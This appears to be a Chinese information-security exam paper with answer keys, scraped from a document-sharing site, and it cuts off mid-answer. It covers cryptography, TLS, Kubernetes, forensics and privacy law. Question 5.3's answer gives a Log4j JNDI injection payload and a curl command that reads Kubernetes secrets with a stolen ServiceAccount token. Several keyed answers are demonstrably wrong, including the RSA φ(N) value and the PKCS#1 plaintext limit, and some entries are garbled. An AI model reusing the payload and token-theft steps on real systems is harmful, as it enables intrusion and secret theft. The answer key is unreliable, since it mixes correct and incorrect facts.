2025年計(jì)算機(jī)信息安全防護(hù)試卷及答案_第1頁(yè)
2025年計(jì)算機(jī)信息安全防護(hù)試卷及答案_第2頁(yè)
2025年計(jì)算機(jī)信息安全防護(hù)試卷及答案_第3頁(yè)
2025年計(jì)算機(jī)信息安全防護(hù)試卷及答案_第4頁(yè)
2025年計(jì)算機(jī)信息安全防護(hù)試卷及答案_第5頁(yè)
已閱讀5頁(yè),還剩11頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

2025年計(jì)算機(jī)信息安全防護(hù)試卷及答案1.單項(xiàng)選擇題(每題1分,共20分)1.1在GB/T222392019《信息安全技術(shù)網(wǎng)絡(luò)安全等級(jí)保護(hù)基本要求》中,第三級(jí)安全要求的“安全區(qū)域邊界”部分首次明確提出的控制點(diǎn)是A.邊界完整性檢查?B.可信驗(yàn)證?C.惡意代碼防護(hù)?D.訪(fǎng)問(wèn)控制審計(jì)答案:B1.2若某RSA密鑰對(duì)的模數(shù)N=pq,其中p=17,q=19,則歐拉函數(shù)φ(N)的值為A.288?B.304?C.323?D.272答案:D1.3在Windows1122H2中,默認(rèn)啟用且用于阻止內(nèi)存注入攻擊的硬件級(jí)安全特性是A.HVCI?B.CFG?C.CET?D.VBS答案:C1.4下列關(guān)于SHA3與SHA256的描述,正確的是A.二者均采用Merkle–Damg?rd結(jié)構(gòu)?B.SHA3的輸出長(zhǎng)度固定為256位C.SHA3的sponge結(jié)構(gòu)中容量位r+c=1600?D.SHA256對(duì)輸入長(zhǎng)度無(wú)限制答案:C1.5在TLS1.3握手過(guò)程中,用于實(shí)現(xiàn)0RTT重放防護(hù)的機(jī)制是A.HelloRetryRequest?B.PSKBinder?C.obfuscatedticketage?D.downgradeprotection答案:C1.6依據(jù)《個(gè)人信息保護(hù)法》,處理敏感個(gè)人信息應(yīng)當(dāng)取得個(gè)人的A.明示同意?B.書(shū)面同意?C.單獨(dú)同意?D.默示同意答案:C1.7在Linux內(nèi)核5.15中,默認(rèn)用于緩解Spectrev2攻擊的編譯選項(xiàng)是A.retbleed=off?B.spectre_v2=auto?C.mitigations=off?D.nopti答案:B1.8下列關(guān)于零信任架構(gòu)(NISTSP800207)錯(cuò)誤的是A.假定網(wǎng)絡(luò)邊界內(nèi)部可信?B.強(qiáng)調(diào)持續(xù)評(píng)估?C.最小權(quán)限訪(fǎng)問(wèn)?D.動(dòng)態(tài)策略執(zhí)行答案:A1.9在AESGCM加密模式中,用于保證完整性的標(biāo)簽長(zhǎng)度默認(rèn)是A.64位?B.96位?C.128位?D.256位答案:C1.10當(dāng)使用Wireshark解密TLS1.3流量時(shí),必須提前獲取的密鑰日志格式標(biāo)記為A.CLIENT_RANDOM?B.SERVER_HANDSHAKE_TRAFFIC_SECRETC.EXPORTER_SECRET?D.EARLY_SECRET答案:B1.11在Kubernetes1.28中,默認(rèn)啟用且用于限制容器進(jìn)程權(quán)限的強(qiáng)制訪(fǎng)問(wèn)控制機(jī)制是A.SELinux?B.AppArmor?C.Seccomp?D.RBAC答案:C1.12下列哪項(xiàng)不屬于國(guó)密算法體系A(chǔ).SM2?B.SM3?C.SM4?D.SM7答案:D1.13在OWASPTop102021中,排名首次進(jìn)入前十的“不安全設(shè)計(jì)”原稱(chēng)為A.A01?B.A02?C.A03?D.A04答案:C1.14若某防火墻采用“首包檢測(cè)”技術(shù),其主要目的是A.降低轉(zhuǎn)發(fā)延遲?B.提高吞吐量?C.減少狀態(tài)表開(kāi)銷(xiāo)?D.防止TCP旁路答案:D1.15在Android13中,用于限制后臺(tái)應(yīng)用獲取設(shè)備標(biāo)識(shí)符的新增權(quán)限是A.READ_PRIVILEGED_PHONE_STATE?B.READ_DEVICE_IDENTIFIERSC.READ_BASIC_PHONE_STATE?D.READ_MEDIA_IMAGES答案:B1.16下列關(guān)于BGP安全擴(kuò)展(RPKI)的描述,正確的是A.ROA對(duì)象由IANA簽發(fā)?B.ROV可防止路徑劫持?C.RPKI依賴(lài)DNSSEC?D.ASPA用于加密BGP報(bào)文答案:B1.17在SQL注入聯(lián)合查詢(xún)中,用于快速判斷列數(shù)一致性的關(guān)鍵字是A.ORDERBY?B.GROUPBY?C.LIMIT?D.UNION答案:A1.18在NISTSP80063B中,推薦的最短口令長(zhǎng)度為A.6字符?B.8字符?C.10字符?D.無(wú)下限,僅復(fù)雜度要求答案:B1.19在IPv6中,用于替代ARP的協(xié)議是A.ND?B.SLAAC?C.DHCPv6?D.MLD答案:A1.20若某日志系統(tǒng)采用RFC5424格式,優(yōu)先級(jí)值facility=16,severity=5,則Priority字段的十進(jìn)制值為A.133?B.128?C.136?D.140答案:A2.多項(xiàng)選擇題(每題2分,共20分;每題至少兩個(gè)正確答案,多選少選均不得分)2.1以下哪些屬于國(guó)密SM2數(shù)字簽名驗(yàn)證過(guò)程中必須的輸入A.簽名者的公鑰?B.消息摘要?C.隨機(jī)數(shù)k?D.簽名值(r,s)答案:ABD2.2在Windows日志取證中,可用來(lái)定位橫向移動(dòng)痕跡的EventID包括A.4624?B.4672?C.4768?D.4776答案:ABCD2.3以下關(guān)于HTTP/3的描述正確的有A.基于QUIC?B.強(qiáng)制使用TLS1.3?C.默認(rèn)端口443?D.支持頭部壓縮QPACK答案:ABD2.4在Linux中,可用于實(shí)現(xiàn)強(qiáng)制訪(fǎng)問(wèn)控制(MAC)的框架有A.SELinux?B.AppArmor?C.TOMOYO?D.Smack答案:ABCD2.5以下哪些算法被納入我國(guó)商用密碼產(chǎn)品認(rèn)證目錄(2023版)A.SM1?B.SM2?C.SM3?D.SM9答案:BCD2.6在容器逃逸攻擊中,可能利用的Linux內(nèi)核漏洞有A.DirtyCow?B.CVE20220847?C.CVE202122555?D.HeartBleed答案:ABC2.7以下屬于TLS1.3支持的密鑰交換算法A.ECDHEP256?B.DHE2048?C.RSA2048?D.PSKwithECDHE答案:ABD2.8在零信任參考架構(gòu)中,可作為策略執(zhí)行點(diǎn)(PEP)的組件有A.API網(wǎng)關(guān)?B.SDP控制器?C.微隔離代理?D.SIEM答案:AC2.9以下關(guān)于GDPR與《個(gè)人信息保護(hù)法》差異的描述,正確的有A.GDPR無(wú)出境評(píng)估制度?B.個(gè)保法引入“敏感個(gè)人信息”概念?C.GDPR罰款上限更高?D.個(gè)保法要求數(shù)據(jù)本地化答案:BC2.10以下哪些屬于軟件供應(yīng)鏈安全治理的關(guān)鍵環(huán)節(jié)A.SBOM生成?B.簽名驗(yàn)證?C.依賴(lài)漏洞掃描?D.運(yùn)行時(shí)RASP答案:ABC3.填空題(每空1分,共20分)3.1在AES算法中,當(dāng)密鑰長(zhǎng)度為192位時(shí),輪數(shù)為_(kāi)_____。答案:123.2在PKCS1v1.5填充模式下,若RSA模長(zhǎng)2048位,則最大可加密明文長(zhǎng)度為_(kāi)_____字節(jié)。答案:2143.3在Linux系統(tǒng)中,用于查看當(dāng)前SELinux策略布爾值的命令是______。答案:getseboola3.4在TLS1.3中,用于實(shí)現(xiàn)前向保密的核心密鑰派生函數(shù)為_(kāi)_____。答案:HKDF3.5在WindowsDefenderApplicationControl中,策略文件的后綴名為_(kāi)_____。答案:.bin3.6在IPv4報(bào)頭中,用于防止分片攻擊的“不分片”標(biāo)志位縮寫(xiě)為_(kāi)_____。答案:DF3.7在SQLMap中,用于指定數(shù)據(jù)庫(kù)類(lèi)型的參數(shù)是______。答案:dbms3.8在NISTSP80053Rev5中,控制族“AC”代表______。答案:AccessControl3.9在Wireshark顯示過(guò)濾器中,用于過(guò)濾HTTP狀態(tài)碼為404的表達(dá)式為_(kāi)_____。答案:http.response.code==4043.10在Kubernetes中,用于保存ServiceAccount令牌的默認(rèn)掛載路徑為_(kāi)_____。答案:/var/run/secrets/kubernetes.io/serviceaccount3.11在BGP報(bào)文中,用于維持鄰居關(guān)系的Keepalive發(fā)送間隔默認(rèn)值為_(kāi)_____秒。答案:603.12在AndroidKeystore中,用于限制密鑰僅在用戶(hù)認(rèn)證后使用的標(biāo)志位為_(kāi)_____。答案:PURPOSE_ENCRYPT|PURPOSE_DECRYPT,setUserAuthenticationRequired(true)3.13在國(guó)密SM4算法中,密鑰擴(kuò)展生成的輪密鑰總數(shù)為_(kāi)_____個(gè)。答案:323.14在PowerShell中,用于繞過(guò)執(zhí)行策略運(yùn)行腳本的參數(shù)為_(kāi)_____。答案:ExecutionPolicyBypass3.15在CTF中,用于快速判斷文件類(lèi)型的命令為_(kāi)_____。答案:file3.16在Git中,用于驗(yàn)證提交簽名的命令為_(kāi)_____。答案:gitverifycommit3.17在RFC2119中,表示“必須”的關(guān)鍵字為_(kāi)_____。答案:MUST3.18在COBIT2019中,治理系統(tǒng)的核心模型稱(chēng)為_(kāi)_____。答案:GovernanceSystemModel3.19在Linux內(nèi)核中,用于緩解Meltdown攻擊的頁(yè)表隔離補(bǔ)丁簡(jiǎn)稱(chēng)為_(kāi)_____。答案:KPTI3.20在Windows事件日志中,登錄類(lèi)型“3”代表______。答案:網(wǎng)絡(luò)登錄4.簡(jiǎn)答題(每題6分,共30分)4.1簡(jiǎn)述TLS1.3與TLS1.2在握手延遲上的差異,并指出實(shí)現(xiàn)0RTT的前提條件。答案:TLS1.3將握手往返次數(shù)從2RTT降至1RTT;若客戶(hù)端與服務(wù)器已共享PSK,則可通過(guò)EarlyData擴(kuò)展實(shí)現(xiàn)0RTT。前提:1.服務(wù)器曾頒發(fā)過(guò)PSKticket;2.客戶(hù)端緩存該P(yáng)SK;3.服務(wù)器允許0RTT;4.雙方協(xié)商的加密套件支持AEAD;5.客戶(hù)端在ClientHello中攜帶early_data擴(kuò)展并在單獨(dú)記錄中發(fā)送加密數(shù)據(jù)。4.2概述國(guó)密SM2數(shù)字簽名生成流程,并指出其隨機(jī)數(shù)k的熵要求。答案:1.計(jì)算消息摘要e=H(m);2.生成隨機(jī)數(shù)k∈[1,n1],n為基點(diǎn)階;3.計(jì)算橢圓曲線(xiàn)點(diǎn)(x1,y1)=kG;4.取r=(e+x1)modn,若r=0或r+k=n則返2;5.計(jì)算s=(1+dA)^1(kr·dA)modn,dA為私鑰;6.簽名值為(r,s)。隨機(jī)數(shù)k須由經(jīng)國(guó)密批準(zhǔn)的隨機(jī)源產(chǎn)生,熵≥256位,且不可重用。4.3說(shuō)明Kubernetes中PodSecurityPolicy被廢棄后的替代機(jī)制,并給出限制容器提權(quán)的YAML字段示例。答案:替代機(jī)制為PodSecurityStandards(PSS)與PodSecurityAdmission(PSA)。限制提權(quán)字段示例:```yamlsecurityContext:allowPrivilegeEscalation:falserunAsNonRoot:truerunAsUser:1000capabilities:drop:["ALL"]```4.4列舉Windows日志取證中檢測(cè)“黃金票據(jù)”攻擊的三種特征,并給出對(duì)應(yīng)EventID。答案:1.異常KerberosTGT簽發(fā):EventID4769,ServiceName為krbtgt,TicketOptions為0x40810010;2.登錄會(huì)話(huà)無(wú)對(duì)應(yīng)4768:出現(xiàn)4769但前置無(wú)4768;3.賬戶(hù)權(quán)限與歷史不符:4672(特殊權(quán)限登錄)中SubjectUserName為普通用戶(hù)卻具備高權(quán)限。4.5解釋“云責(zé)任共擔(dān)模型”中IaaS場(chǎng)景下,云服務(wù)提供商與客戶(hù)各自負(fù)責(zé)的安全邊界。答案:提供商:物理基礎(chǔ)設(shè)施、宿主機(jī)虛擬化層、網(wǎng)絡(luò)底層、存儲(chǔ)控制器、管理程序補(bǔ)??;客戶(hù):操作系統(tǒng)、應(yīng)用、數(shù)據(jù)、身份與訪(fǎng)問(wèn)管理、網(wǎng)絡(luò)安全組配置、加密密鑰管理、備份策略。5.應(yīng)用題(共60分)5.1計(jì)算與分析(15分)某企業(yè)采用AES128GCM加密VPN流量,已知每包最大傳輸單元MTU=1400字節(jié),其中IV占12字節(jié),標(biāo)簽占16字節(jié),IP+UDP+ESP頭共占52字節(jié)。求:(1)單包最大應(yīng)用數(shù)據(jù)載荷長(zhǎng)度;(2)若應(yīng)用層產(chǎn)生1MiB數(shù)據(jù),約需多少個(gè)ESP包;(3)當(dāng)網(wǎng)絡(luò)丟包率p=1%時(shí),采用立即重傳機(jī)制,期望額外傳輸字節(jié)數(shù)。答案:(1)1400521216=1320字節(jié);(2)1MiB=1048576B,包數(shù)=ceil(1048576/1320)=795包;(3)每包期望重傳次數(shù)E=1/(1p)1≈0.0101,總重傳包數(shù)=795×0.0101≈8.03,取9包,額外字節(jié)=9×1400=12600字節(jié)。5.2綜合設(shè)計(jì)(15分)設(shè)計(jì)一套基于國(guó)密算法的電子公文交換系統(tǒng),要求滿(mǎn)足三級(jí)等保、國(guó)密合規(guī)、前向保密、抗抵賴(lài)。給出:(1)協(xié)議分層圖;(2)密鑰生命周期管理表;(3)關(guān)鍵密碼算法選型與用途;(4)安全審計(jì)點(diǎn)列表。答案:(1)分層:應(yīng)用層(SM2簽名/驗(yàn)簽)、消息層(SM4GCM加密)、傳輸層(TLCP1.1國(guó)密雙證書(shū))、網(wǎng)絡(luò)層(IPSec/ESPSM4SM3);(2)生命周期:生成(國(guó)密隨機(jī)數(shù)模塊)→分發(fā)(KMIPoverTLCP)→使用(HSM調(diào)用)→備份(門(mén)限SM2Shamir35)→銷(xiāo)毀(HSM物理清零);(3)SM2:簽名/密鑰交換;SM3:摘要;SM4:對(duì)稱(chēng)加密;SM9:可選無(wú)證書(shū)加密郵件;(4)審計(jì):密鑰生成日志、簽名驗(yàn)簽結(jié)果、證書(shū)狀態(tài)查詢(xún)OCSP、GMT0009時(shí)間戳、ESP包計(jì)數(shù)異常、SM4密鑰更新事件。5.3漏洞分析(15分)給出Log4j2.xJNDI注入(CVE202144228)在CloudNative環(huán)境下的完整利用鏈,并指出:(1)觸發(fā)點(diǎn)源碼行;(2)繞過(guò)2.15rc1的payload示例;(3)在容器化環(huán)境中利用ServiceAccount調(diào)用KubernetesAPI的步驟;(4)基于eBPF的實(shí)時(shí)防御腳本核心思路。答案:(1)log4jcore2.14.1.jar中MessagePatternConverter.format()第486行:config.getStrSubstitutor().replace(event,value);(2)${jndi:ldap://:1389/a}利用URL解析差異繞過(guò);(3)步驟:1.注入字段獲取ServiceAccount令牌;2.curlkH“Authorization:Bearer$(cattoken)”https://kubernetes.default.svc/api/v1/secrets;3.掛載secret到攻擊者Pod;4.橫向移動(dòng);(4)eBPF

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論